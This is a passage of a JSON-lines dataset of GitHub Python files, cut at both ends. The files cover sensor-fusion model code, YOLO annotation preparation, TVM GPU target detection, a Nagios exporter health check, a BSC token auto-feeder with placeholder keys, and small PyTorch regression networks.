x.size()\n x = x.view(B * N, C, H, W)\n\n x = self.encoders[\"camera\"][\"backbone\"](x)\n x = self.encoders[\"camera\"][\"neck\"](x)\n \n if not isinstance(x, torch.Tensor):\n x = x[0]\n \n BN, C, H, W = x.size()\n x = x.view(B, int(BN / B), C, H, W)\n # x = self.volume_vtransform_embed(x, img_metas)\n x = self.encoders[\"camera\"][\"vtransform\"](\n x,\n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n img_metas,\n )\n \n x = self.deblock_camera(x)\n \n return x\n \n @torch.no_grad()\n @force_fp32()\n def voxelize_sst(self, points):\n \"\"\"Apply dynamic voxelization to points.\n\n Args:\n points (list[torch.Tensor]): Points of each sample.\n\n Returns:\n tuple[torch.Tensor]: Concatenated points and coordinates.\n \"\"\"\n coors = []\n # dynamic voxelization only provide a coors mapping\n for res in points:\n res_coors = self.encoders[\"lidar\"][\"voxelize\"](res)\n coors.append(res_coors)\n points = torch.cat(points, dim=0)\n coors_batch = []\n for i, coor in enumerate(coors):\n coor_pad = F.pad(coor, (1, 0), mode='constant', value=i)\n coors_batch.append(coor_pad)\n coors_batch = torch.cat(coors_batch, dim=0)\n return points, coors_batch\n\n @torch.no_grad()\n @force_fp32()\n def voxelize(self, points):\n feats, coords, sizes = [], [], []\n for k, res in enumerate(points):\n ret = self.encoders[\"lidar\"][\"voxelize\"](res)\n if len(ret) == 3:\n # hard voxelize\n f, c, n = ret\n else:\n assert len(ret) == 2\n f, c = ret\n n = None\n feats.append(f)\n coords.append(F.pad(c, (1, 0), mode=\"constant\", value=k))\n if n is not None:\n sizes.append(n)\n\n feats = torch.cat(feats, dim=0)\n coords = torch.cat(coords, dim=0)\n if len(sizes) > 0:\n sizes = torch.cat(sizes, dim=0)\n if self.voxelize_reduce:\n feats = feats.sum(dim=1, keepdim=False) / sizes.type_as(feats).view(\n -1, 1\n )\n feats = feats.contiguous()\n\n return feats, coords, sizes\n \n def extract_lidar_features(self, x) -> torch.Tensor:\n voxels, coors = self.voxelize_sst(x)\n batch_size = coors[-1, 0].item() + 1\n voxel_features, feature_coors = self.encoders[\"lidar\"][\"voxel_encoder\"](voxels, coors)\n x = self.encoders[\"lidar\"][\"middle_encoder\"](voxel_features, feature_coors, batch_size)\n x = self.encoders[\"lidar\"][\"backbone\"](x)\n return x\n \n @auto_fp16(apply_to=('img, points'))\n def forward(self,\n img,\n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas,\n gt_bboxes_3d=None,\n gt_labels_3d=None,\n gt_masks_bev=None,\n **kwargs,\n ):\n \n if isinstance(img, list):\n raise NotImplementedError\n else:\n output = self.forward_single(\n img,\n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas,\n gt_bboxes_3d,\n gt_labels_3d,\n gt_masks_bev\n )\n return output\n \n @auto_fp16(apply_to=(\"img, points\"))\n def forward_single(self, \n img, \n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas,\n gt_bboxes_3d=None,\n gt_labels_3d=None,\n gt_masks_bev=None,\n ):\n \n features = []\n for sensor in (\n self.encoders if not self.training else list(self.encoders.keys())[::-1]\n ):\n if sensor == \"camera\":\n feature = self.extract_camera_features(\n img, \n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas\n )\n elif sensor == \"lidar\":\n feature = self.extract_lidar_features(points)\n feature = self.deblock_lidar(feature)\n else:\n raise ValueError(f\"unsupported sensor: {sensor}\")\n features.append(feature)\n \n if not self.training:\n # avoid OOM\n features = features[::-1]\n \n x = self.fusion_module(features)\n x = torch.cat(x, dim=1)\n x = torch.cat(x.unbind(dim=-1), 1)\n \n x = self.deblock_fusion(x)\n \n batch_size = x.shape[0]\n\n x = self.decoder[\"backbone\"](x)\n x = self.decoder[\"neck\"](x)\n \n if self.training:\n outputs = {}\n for type, head in self.heads.items():\n if type == \"object\":\n pred_dict = head(x, metas)\n losses = head.loss(gt_bboxes_3d, gt_labels_3d, pred_dict)\n elif type == \"map\":\n losses = head(x, gt_masks_bev)\n else:\n raise ValueError(f\"unsupported head: {type}\")\n for name, val in losses.items():\n if val.requires_grad:\n outputs[f\"loss/{type}/{name}\"] = val * self.loss_scale[type]\n else:\n outputs[f\"stats/{type}/{name}\"] = val\n return outputs\n else:\n outputs = [{} for _ in range(batch_size)]\n # viz = True\n for type, head in self.heads.items():\n if type == \"object\":\n pred_dict = head(x, metas)\n bboxes = head.get_bboxes(pred_dict, metas)\n if isinstance(bboxes, torch.Tensor):\n return bboxes\n else:\n for k, (boxes, scores, labels) in enumerate(bboxes):\n outputs[k].update(\n {\n \"boxes_3d\": boxes.to(\"cpu\"),\n \"scores_3d\": scores.cpu(),\n \"labels_3d\": labels.cpu(),\n }\n )\n elif type == \"map\":\n logits = head(x)\n for k in range(batch_size):\n outputs[k].update(\n {\n \"masks_bev\": logits[k].cpu(),\n \"gt_masks_bev\": gt_masks_bev[k].cpu(),\n }\n )\n else:\n raise ValueError(f\"unsupported head: {type}\")\n return outputs\n","repo_name":"hollow-503/UniM2AE","sub_path":"Finetune/bevfusion/mmdet3d/models/fusion_models/unim2ae_mmim.py","file_name":"unim2ae_mmim.py","file_ext":"py","file_size_in_byte":18905,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"6"} +{"seq_id":"658570011","text":"data_path = \"ultraFinale.txt\"\nnum = -1\nunfinished = False\nfirst = True\nf = open(data_path, encoding=\"utf8\")\nlastLine = \"\"\nlines = f.readlines()\nfor line in lines:\n num += 1\n if len(line) <= 1 and line != \"\\n\":\n lines.pop(num)\nnum = -1\nfor line in lines:\n num += 1\n if line == \"\\n\" and line == lastLine:\n lines.pop(num)\n lastLine = line\nf.close()\n\nnew_file = open(\"lastFinal.txt\", 'w', encoding=\"utf-8\")\n\nfor line in lines:\n new_file.write(line)\n\nnew_file.close()\n","repo_name":"Soontosh/Harry-Potter-Dataset-Cleaning","sub_path":"removeUnecessaryNewLines.py","file_name":"removeUnecessaryNewLines.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43135544981","text":"\"\"\"\nyolo 모델을 학습시키기위해 필요한 annotation txt 파일을 생성하는 script다.\n\"\"\"\n\nimport json\nimport os, glob\nimport time\nfrom tqdm import tqdm\nimport pydicom\nfrom pydicom import dcmread\nimport re\nimport mritopng\nfrom matplotlib import pyplot as plt\n\ndef preprocessing_json(json_dir):\n json_list = get_json_list(json_dir)\n\n for _,json_name in enumerate(tqdm(json_list)):\n data = open_json(json_name)\n dicom_name = json_name[:-11] + '.dcm'\n img_x, img_y = get_dicom_size(dicom_name)\n bbox = get_bbox(data)\n point = get_yolo(bbox, img_x, img_y)\n anot_list = make_anot_list(data, point)\n #folder_name = json_name[:-4]+'txt'\n txt_name = json_name.split('\\\\')[-1][:-11] + '.txt'\n if anot_list:\n save_txt(txt_save_path, txt_name, anot_list)\n time.sleep(0.005)\n\n\ndef get_dicom_size(dicom_name):\n ds = dcmread(dicom_name)\n #ds.PhotometricInterpretation = 'YBR_FULL'\n img_x, img_y = ds.pixel_array.shape\n\n #print(\"dicom size:\", img_x, img_y)\n return img_x, img_y\n\n\n#yolo 모델의 경우 annotation의 형식으로 center(x,y) 좌표와 width, height의 상댓값을 필요로한다.\ndef get_yolo(bbox_list, img_x, img_y):\n point_list = list()\n x_list = list()\n if len(bbox_list) >= 1:\n for i in range(len(bbox_list)):\n center_x = float(bbox_list[i][2]) / img_x\n center_y = float(bbox_list[i][4]) / img_y\n width = float(bbox_list[i][6]) / img_x\n height = float(bbox_list[i][8]) / img_y\n\n point = str(center_x) + \" \" + str(center_y) + \" \" + str(width) + \" \" + str(height)\n #print(\"point\", point)\n\n point_list.append(point)\n else:\n point_list = []\n\n #print(\"point_list:\", point_list)\n return point_list\n\n\n\ndef get_stage(json_data):\n json_get = json_data.get('images')\n json_get_anot = json_get[0].get('class')\n return str(json_get_anot)\n\ndef open_json(data_path):\n with open(data_path, 'r', encoding='UTF8') as f:\n json_data = json.load(f, strict=False)\n f.close()\n\n #print(\"json_data:\", json_data)\n return json_data\n\n\ndef get_json_list(json_dir):\n json_list = list()\n\n print(\"\\n\")\n print(\"Searching for json files...\")\n\n for root, dirs, files in os.walk(json_dir):\n for file in files:\n if file.endswith(\"_merge.json\"):\n json_path = os.path.join(root, file)\n json_list.append(json_path)\n\n #print(json_list)\n return json_list\n\ndef get_bbox(json_data):\n bbox_list = []\n json_get = json_data.get('images')\n bbox = json_get[0].get('boxes')\n if type(bbox) is str:\n print(type(bbox))\n #bbox정보가 string이라서 하는 작업\n b = bbox[1:-1]\n bb = re.split('{|}|: |, ', b)\n n = 10\n bbox_list = [bb[i:i + n] for i in range(0, len(bb), n)]\n\n #print(\"bbox_list:\", bbox_list)\n #print(\"len(bbox_list):\", len(bbox_list))\n return bbox_list\n\n\ndef make_anot_list(json_data, point_list):\n anot_list = list()\n if len(point_list) == 0:\n point = get_stage(json_data) + \" \" + str('none')\n anot_list.append(point)\n else:\n for i in range(len(point_list)):\n point = get_stage(json_data) + \" \" + point_list[i]\n #print(\"point:\", point)\n anot_list.append(point)\n\n return anot_list\n\ndef save_txt(save_path, filename, anot_list):\n print(\"Start creating text files...\")\n #with open(folder_name, 'w') as f:\n with open(save_path + \"\\\\\" + filename, 'w') as f:\n f.write('\\n'.join(anot_list))\n f.close()\n\n\ndef dicom2png(json_dir, png_save_path):\n count = 0\n for root, dirs, files in os.walk(json_dir):\n for file in files:\n if file.endswith(\".dcm\"):\n dcm_path = os.path.join(root, file)\n json_path = dcm_path[:-4] + '_merge.json'\n if os.path.isfile(json_path):\n #png_name = dcm_path.split('\\\\')[-1][:-4] + '.png'\n # png_path = png_save_path + \"\\\\\" + png_name\n # d = dcmread(dcm_path)\n # d.PhotometricInterpretation = 'YBR_FULL'\n # plt.imsave(png_path, d.pixel_array, cmap=plt.cm.bone)\n\n png_name = dcm_path.split('\\\\')[-1][:-4] + '.png'\n png_path = png_save_path + png_name\n mritopng.convert_file(dcm_path, png_path)\n count += 1\n print(\"success\", count, png_path)\n\n\n\nif __name__ == '__main__':\n txt_save_path = r\"../../dataset/labels/\" #(수정)path to save output txt file\n png_save_path = r\"../../dataset/images/\" #(수정)path to save converted image file(dicom to png)\n json_dir = r\"../../dataset/train/\" #(수정)merge json이 존재하는 상위폴더\n\n #test path\n # json_dir = r\"../../dataset/00testtest/\"\n # txt_save_path = r\"../../dataset/00testtest/labels/\"\n # png_save_path = r\"../../dataset/00testtest/images/\"\n\n\n preprocessing_json(json_dir)\n print(\"끝111111111\\n\")\n dicom2png(json_dir, png_save_path)\n print(\"끝22222222222222\\n\")","repo_name":"newmade01/PytorchPOC_YOLO_EfficientNet","sub_path":"Train/2.DataPrepare/make_txt_c18.py","file_name":"make_txt_c18.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41193351530","text":"from urllib.request import urlretrieve\nimport pandas as pd\nimport os\nimport gzip\nimport shutil\n\ndef gunzip(infile):\n '''\n Unzip a file with .gz extension. Will remove extension in outfile.\n If the file does not have a .gz extension, do not unzip.\n '''\n if not infile.endswith('.gz'):\n return\n with gzip.open(infile, 'rb') as f_in:\n with open(infile.rstrip('.gz'), 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n os.remove(infile)\n\ndef retrieve_file(address, outfile):\n '''\n If url, download. If file, move it to the new location.\n Note the path of a file should be the absolute path because\n snakemake will likely be run in --directory mode.\n '''\n try:\n local_path, headers = urlretrieve(address, outfile)\n #not url\n except ValueError:\n shutil.copy(address, outfile)\n\nann_df = pd.read_csv(os.path.join(snakemake.config['parameter_dir'],\nsnakemake.config['seqs_and_annotations'])).set_index('organism', drop = False)\n\ndownload_dict = snakemake.params['to_download']\noutdir = snakemake.params['outdir']\nfor i in download_dict:\n address = ann_df.loc[snakemake.wildcards.org, i]\n if address.endswith('.gz'):\n gzipped_file = os.path.join(outdir, download_dict[i]) + '.gz'\n retrieve_file(address, gzipped_file)\n gunzip(gzipped_file)\n else:\n retrieve_file(address, os.path.join(outdir, download_dict[i]))\n","repo_name":"marykthompson/ribopop_probe_design","sub_path":"scripts/download_seqs.py","file_name":"download_seqs.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"32219465692","text":"import ctypes\nimport time\n\nlib = ctypes.cdll.LoadLibrary('./libfacerec.so')\n\ndef ConvertString2CTyoeStr(str):\n result = (ctypes.c_char * len(str))(*str)\n return result\n\n\nclass StructPointer(ctypes.Structure):\n _fields_ = [(\"isRec\", ctypes.c_bool),\n (\"data\", ctypes.c_float * 1025)]\n\n\nclass FaceExt(object):\n def __init__(self):\n self.obj = lib.FaceExt_new()\n\n def init(self):\n lib.FaceExt_init(self.obj)\n\n def getFeature(self, image_path):\n return lib.FaceExt_getFeature(self.obj, image_path)\n\n\nlib.FaceExt_getFeature.restype = ctypes.POINTER(StructPointer)\nfe = FaceExt()\nfe.init()\nfor i in range(0, 3):\n t1 = time.clock()\n image_path = ctypes.c_char_p(bytes(\"./test.jpg\", 'utf-8'))\n t2 = time.clock()\n f = fe.getFeature(image_path)\n t3 = time.clock()\n print(\"isRec:\", f.contents.isRec)\n print(\"data[0]:\")\n print(f.contents.data[0])\n print(\"1\", t2 - t1)\n print(\"2\", t3 - t2)\n","repo_name":"touchwest/Seetaface4py","sub_path":"example/seetaface4py.py","file_name":"seetaface4py.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"10478409630","text":"from web3 import Web3\nfrom time import sleep\nimport time\n\nclass LuckyCatFeeder():\n def __init__(self):\n # Connect to the BSC Web3 provider\n self.web3 = Web3(Web3.HTTPProvider('https://bsc-dataseed.binance.org/'))\n\n with open('luckycat.abi', 'r') as f:\n lucky_abi = f.read()\n lucky_addr = '0xb50e74A6b82F59c4058b5D798E3D9C9D9B8c6e16'\n self.lucky_contract = self.web3.eth.contract(address=lucky_addr, abi=lucky_abi)\n \n\n def feed_cats(self):\n self.referral_address = '0xdF0833C041db53856380CF1e64CD6428A9e41D3d'\n self.sender_address= 'WALLET ADDRESS HERE'\n self.nonce = self.web3.eth.get_transaction_count(self.sender_address)\n self.feed_cats = self.lucky_contract.functions.hatchEggs(self.referral_address).buildTransaction({'from': self.sender_address,'value': self.web3.toWei(0,'ether'),'gas': 300000, 'gasPrice': self.web3.toWei('5','gwei'),'nonce': self.nonce,})\n self.signed_txn = self.web3.eth.account.sign_transaction(self.feed_cats, private_key='PRIVATE KEY HERE')\n self.tx_token = self.web3.eth.send_raw_transaction(self.signed_txn.rawTransaction)\n del self.feed_cats\n\nif __name__ == \"__main__\":\n\n lc = LuckyCatFeeder()\n\n\n while(True):\n\n lc.feed_cats()\n print('Cats Fed')\n sleep(86400)","repo_name":"bourbondefi/luckycat-auto-feeder","sub_path":"luckycatautofeeder.py","file_name":"luckycatautofeeder.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21793251722","text":"import logging\n\nimport tvm\nfrom tvm.target import Target\n\nlogger = logging.getLogger(__file__)\n\n\ndef detect_local_metal_host():\n target_triple: str = tvm._ffi.get_global_func(\"tvm.codegen.llvm.GetDefaultTargetTriple\")()\n process_triple: str = tvm._ffi.get_global_func(\"tvm.codegen.llvm.GetProcessTriple\")()\n host_cpu: int = tvm._ffi.get_global_func(\"tvm.codegen.llvm.GetHostCPUName\")()\n logger.info(\n f\"Host CPU dection:\\n Target triple: {target_triple}\\n Process triple: {process_triple}\\n Host CPU: {host_cpu}\"\n )\n if target_triple.startswith(\"x86_64-\"):\n return Target(\n {\n \"kind\": \"llvm\",\n \"mtriple\": \"x86_64-apple-macos\",\n \"mcpu\": host_cpu,\n }\n )\n elif target_triple.startswith(\"arm64-\"):\n return Target(\n {\n \"kind\": \"llvm\",\n \"mtriple\": \"arm64-apple-macos\",\n \"mcpu\": host_cpu,\n }\n )\n else:\n raise RuntimeError(\"Unsupported target triple: %s\" % target_triple)\n\n\ndef detect_local_metal():\n dev = tvm.metal()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"metal\",\n \"max_shared_memory_per_block\": 32768,\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"thread_warp_size\": 32,\n },\n host=detect_local_metal_host(),\n )\n\n\ndef detect_local_cuda():\n dev = tvm.cuda()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"cuda\",\n \"max_shared_memory_per_block\": dev.max_shared_memory_per_block,\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"thread_warp_size\": dev.warp_size,\n \"registers_per_block\": 65536,\n \"arch\": \"sm_\" + dev.compute_version.replace(\".\", \"\"),\n }\n )\n\n\ndef detect_local_rocm():\n dev = tvm.rocm()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"rocm\",\n \"max_shared_memory_per_block\": dev.max_shared_memory_per_block,\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"thread_warp_size\": dev.warp_size,\n }\n )\n\n\ndef detect_local_vulkan():\n dev = tvm.vulkan()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"vulkan\",\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"max_shared_memory_per_block\": dev.max_shared_memory_per_block,\n \"thread_warp_size\": dev.warp_size,\n \"supports_float16\": 1,\n \"supports_int16\": 1,\n \"supports_int8\": 1,\n \"supports_16bit_buffer\": 1,\n }\n )\n\n\ndef detect_local_opencl():\n dev = tvm.opencl()\n if not dev.exist:\n return None\n\n return Target(\"opencl\")\n\n\ndef detect_local_target() -> Target:\n for method in [\n detect_local_metal,\n detect_local_rocm,\n detect_local_cuda,\n detect_local_vulkan,\n detect_local_opencl,\n ]:\n target = method()\n if target is not None:\n return target\n\n print(\"Failed to detect local GPU, falling back to CPU as a target\")\n return Target(\"llvm\")\n\n\ndef parse_target(target: str) -> tuple[Target, str]:\n print(target)\n\n if target == \"auto\":\n tvm_target = detect_local_target()\n if tvm_target.host is None:\n tvm_target = Target(\n target,\n host=\"llvm\", # TODO: detect host cpu\n )\n tvm_target_kind = tvm_target.kind.default_keys[0]\n elif target in [\"cuda\", \"cuda-multiarch\"]:\n tvm_target = detect_local_cuda()\n if tvm_target is None:\n raise RuntimeError(\"No local CUDA GPU found!\")\n\n tvm_target_kind = tvm_target.kind.default_keys[0]\n if target == \"cuda-multiarch\":\n tvm_target_kind += \"-multiarch\"\n elif target == \"metal\":\n tvm_target = detect_local_metal()\n if tvm_target is None:\n logger.warning(\"No local Apple Metal GPU found, Falling back...\")\n tvm_target = Target(\n Target(\n {\n \"kind\": \"metal\",\n \"max_threads_per_block\": 256,\n \"max_shared_memory_per_block\": 32768,\n \"thread_warp_size\": 1,\n }\n ),\n host=detect_local_metal_host(),\n )\n\n tvm_target_kind = tvm_target.kind.default_keys[0]\n elif target == \"llvm\":\n tvm_target = Target(target, host=\"llvm\")\n tvm_target_kind = tvm_target.kind.default_keys[0]\n else:\n raise RuntimeError(f\"Unsupported target: {target}\")\n\n print(tvm_target, tvm_target_kind)\n\n if tvm_target_kind == \"cuda-multiarch\":\n from tvm.contrib import nvcc\n\n assert tvm_target.arch[3:] != \"\"\n if int(tvm_target.arch[3:]) >= 70:\n compute_versions = [70, 72, 75, 80, 86, 87, 89, 90]\n else:\n compute_versions = [60, 61, 62]\n\n tvm_target_kind = \"cuda\"\n\n @tvm.register_func(\"tvm_callback_cuda_compile\", override=True)\n def tvm_callback_cuda_compile(code, target): # pylint: disable=unused-argument\n \"\"\"use nvcc to generate fatbin code for better optimization\"\"\"\n arch = []\n for compute_version in compute_versions:\n arch += [\"-gencode\", f\"arch=compute_{compute_version},code=sm_{compute_version}\"]\n ptx = nvcc.compile_cuda(code, target_format=\"fatbin\", arch=arch)\n return ptx\n\n logger.info(f\"Using target: {tvm_target}\")\n\n return tvm_target, tvm_target_kind\n","repo_name":"vivym/OmniCC","sub_path":"omni_cc/utils/target_utils.py","file_name":"target_utils.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19643349962","text":"import argparse\nimport sys\nimport requests\nimport re\n\nSTATE_OK = 0\nSTATE_WARNING = 1\nSTATE_CRITICAL = 2\nSTATE_UNKNOWN = 3\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Nagios plugin to query prometheus exporter and monitor metrics')\n parser.add_argument(\n '--exporter_api',\n metavar='--exporter_api',\n type=str,\n required=True,\n help='exporter location with scheme and port')\n parser.add_argument('--health_metric', metavar='--health_metric', type=str,\n required=False, default=\"health_status\",\n help='Name of health metric')\n parser.add_argument('--critical', metavar='--critical', type=int,\n required=True,\n help='Value to alert critical')\n parser.add_argument('--warning', metavar='--warning', type=int,\n required=False,\n help='Value to alert warning')\n\n args = parser.parse_args()\n metrics, error_messages = query_exporter_metric(\n args.exporter_api, args.health_metric)\n if error_messages:\n print(\n \"Unknown: unable to query metrics. {}\".format(\n \",\".join(error_messages)))\n sys.exit(STATE_UNKNOWN)\n\n criticalMessages = []\n warningMessages = []\n for key, value in metrics.iteritems():\n if value == args.critical:\n criticalMessages.append(\n \"Critical: {metric_name} metric is a critical value of {metric_value}({detail})\".format(\n metric_name=args.health_metric, metric_value=value, detail=key))\n elif args.warning and value == args.warning:\n warningMessages.append(\n \"Warning: {metric_name} metric is a warning value of {metric_value}({detail})\".format(\n metric_name=args.health_metric, metric_value=value, detail=key))\n\n if criticalMessages:\n print(\",\".join(criticalMessages))\n sys.exit(STATE_CRITICAL)\n elif warningMessages:\n print(\",\".join(warningMessages))\n sys.exit(STATE_WARNING)\n else:\n print(\"OK: {metric_name} metric has a OK value({detail})\".format(\n metric_name=args.health_metric, detail=str(metrics)))\n sys.exit(STATE_OK)\n\n\ndef query_exporter_metric(exporter_api, metric_name):\n error_messages = []\n metrics = dict()\n try:\n response = requests.get(include_schema(exporter_api), verify=False) # nosec\n line_item_metrics = re.findall(\n \"^{}.*\".format(metric_name),\n response.text,\n re.MULTILINE)\n for metric in line_item_metrics:\n metric_with_labels, value = metric.split(\" \")\n metrics[metric_with_labels] = float(value)\n except Exception as e:\n error_messages.append(\n \"ERROR retrieving ceph exporter api {}\".format(\n str(e)))\n\n return metrics, error_messages\n\n\ndef include_schema(api):\n if api.startswith(\"http://\") or api.startswith(\"https://\"):\n return api\n else:\n return \"http://{}\".format(api)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"att-comdev/nagios","sub_path":"plugins/check_exporter_health_metric.py","file_name":"check_exporter_health_metric.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21896378181","text":"#!/bin/python\n\"\"\"\nSkript um Vorhersage des Modells zu testen\n\nAusführen:\n```\npython predict.py\n```\n\"\"\"\n\nimport joblib\nimport pandas as pd\n\ndef predict():\n \"\"\"Beispiel Funktion zur Vorhersage mit \n trainiertem Modell\"\"\"\n clf = joblib.load(\"models/model.pkl\")\n\n # Einlesen der Daten\n filepath = \"data/interim/model_dev_data.pkl\"\n\n data_df = pd.read_pickle(filepath)\n labels = data_df[\"label\"].copy()\n features = data_df.drop(columns=[\"label\"]).copy()\n\n print(features.iloc[0:1])\n\n print(f\"label: {labels.iloc[0]}\")\n print(f\"prediction: {clf.predict(features.iloc[0:1])[0]}\")\n\nif __name__ == \"__main__\":\n predict()\n","repo_name":"mbunse/mlcomops","sub_path":"predict_titanic_survival/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"de","doc_type":"code","stars":15,"dataset":"github-code","pt":"6"} +{"seq_id":"29918404830","text":"#Tarea 10, para lenguajes de programacion\nprint (\"Este programa utilizando la serie:\")\nprint (\"senx=Σ((-1)^n)x^(2n+1)/(2n+1)!\")\nprint (\"obtiene la funcion seno(θ) Donde n es el numero de terminos de la serie que toma y evalua n=4,6,9,10 e imprime esos valores\")\nwhile True:\n rg=float(input(\"Ingresa el angulo a evaluar en grados: \"))\n rad=rg*3.141592654/180 #x son los radianes, asi que transformamos los grados en radianes\n acum=0 #inicializamos este acumulador, para que funcione como sumatoria\n print (\"Seno(\"+str(rg)+\")=\")\n for i in range(0,11):\n fact=1\n k=2*i+1\n kk=k\n for j in range(1,k): #aqui se utiliza la funcion factorial\n fact=kk*fact\n kk=kk-1\n if fact==0:#si factorial es igual a 0, se convertira en 1\n fact=1\n s=((-1)**i)*(rad**(k))/fact\n acum=acum+s #aqui sumamos la funcion, para aproximar seno\n if i==4: #aqui se imprime el valor buscado, donde i es n\n print (\"En n=4 es: \",acum)\n elif i==6:\n print (\"En n=6 es: \",acum)\n elif i==9:\n print (\"En n=9 es: \",acum)\n elif i==10:\n print (\"En n=10 es: \",acum)\n print(\"¿Desea obtener otra funcion seno? si/no\")\n sn=input()\n while sn[0].lower()!=\"s\" and sn[0].lower()!=\"n\": #comprobamos que ingresaron un valor valido para que continue o termine\n print(\"El valor \"+str(sn)+\" No es valido, ingrese si/no: \")\n sn=input()\n if sn[0].lower()==\"n\": #si es un n, se rompe el ciclo, y termina el programa\n break\nprint (\"***Fin***\")","repo_name":"EdmundoD3/Ejercicios-de-Python","sub_path":"programas python parte 1/T10_Funcion_seno.py","file_name":"T10_Funcion_seno.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5291382202","text":"import PyQt5.QtWidgets as QtW\n\nfrom .player_view import PlayerView\n\n\nclass MainViewStack(QtW.QStackedWidget):\n\n def __init__(\n self,\n player_view: PlayerView,\n # settings_view,\n # plugins_view,\n ):\n super().__init__()\n self.addWidget(player_view)\n self.setCurrentWidget(player_view)\n","repo_name":"pawel-glomski/jerboa","sub_path":"src/jerboa/ui/gui/main_view_stack.py","file_name":"main_view_stack.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"17884415340","text":"from .common import Common\nfrom .vocabulary import ThreatTag as tt\nfrom .vocabulary import ThreatExchange as t\n\n\nclass ThreatTag(Common):\n\n _URL = t.URL + t.VERSION + t.THREAT_TAGS\n _DETAILS = t.URL + t.VERSION\n _RELATED = t.URL + t.VERSION\n\n _fields = [\n tt.ID,\n tt.NAME,\n tt.TAGGED_OBJECTS,\n tt.TEXT,\n tt.TYPE,\n ]\n\n _default_fields = [\n tt.ID,\n tt.NAME,\n tt.TAGGED_OBJECTS,\n tt.TEXT,\n tt.TYPE,\n ]\n\n _unique = [\n ]\n","repo_name":"WeilerWebServices/Facebook","sub_path":"ThreatExchange/api-reference-examples/python/pytx/pytx/threat_tag.py","file_name":"threat_tag.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"37416029206","text":"import gams\nfrom gams import GamsWorkspace\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nfrom scipy import stats\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision\nfrom torchvision import models, transforms\n\nimport glob\nimport os.path as osp\nimport random\nimport json\nfrom PIL import Image\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport xml.etree.ElementTree as ET\nfrom itertools import product\nfrom math import sqrt\nimport time\nimport dataloader\n\n# 비실행 파일\n# 데이터 모델 구조 정의하기\n# 학습 함수 정의하기\nclass RegressionNet(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,phase):\n super(RegressionNet,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,1024),\n nn.LeakyReLU(),\n nn.Linear(1024,128),\n nn.LeakyReLU(),\n nn.Linear(128,16),\n nn.LeakyReLU(),\n nn.Linear(16,2)\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\n\nclass RegressionNetX(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,X,phase):\n super(RegressionNetX,self).__init__()\n self.phase = phase\n self.X = X\n self.Linearnet = nn.Sequential(\n nn.Linear(self.X,1024),\n nn.LeakyReLU(),\n nn.Linear(1024,128),\n nn.LeakyReLU(),\n nn.Linear(128,16),\n nn.LeakyReLU(),\n nn.Linear(16,2)\n )\n\n def forward(self, x):\n x=x.reshape([-1,self.X])\n x = self.Linearnet(x)\n return x\n\n\nclass DeepNeuralNet(nn.Module):\n '''실패한 듯 좋지 않다.'''\n def __init__(self,phase):\n super(DeepNeuralNet,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,1024),\n nn.LeakyReLU(),\n nn.Linear(1024,1024),\n nn.LeakyReLU(),\n nn.Linear(1024, 1024),\n 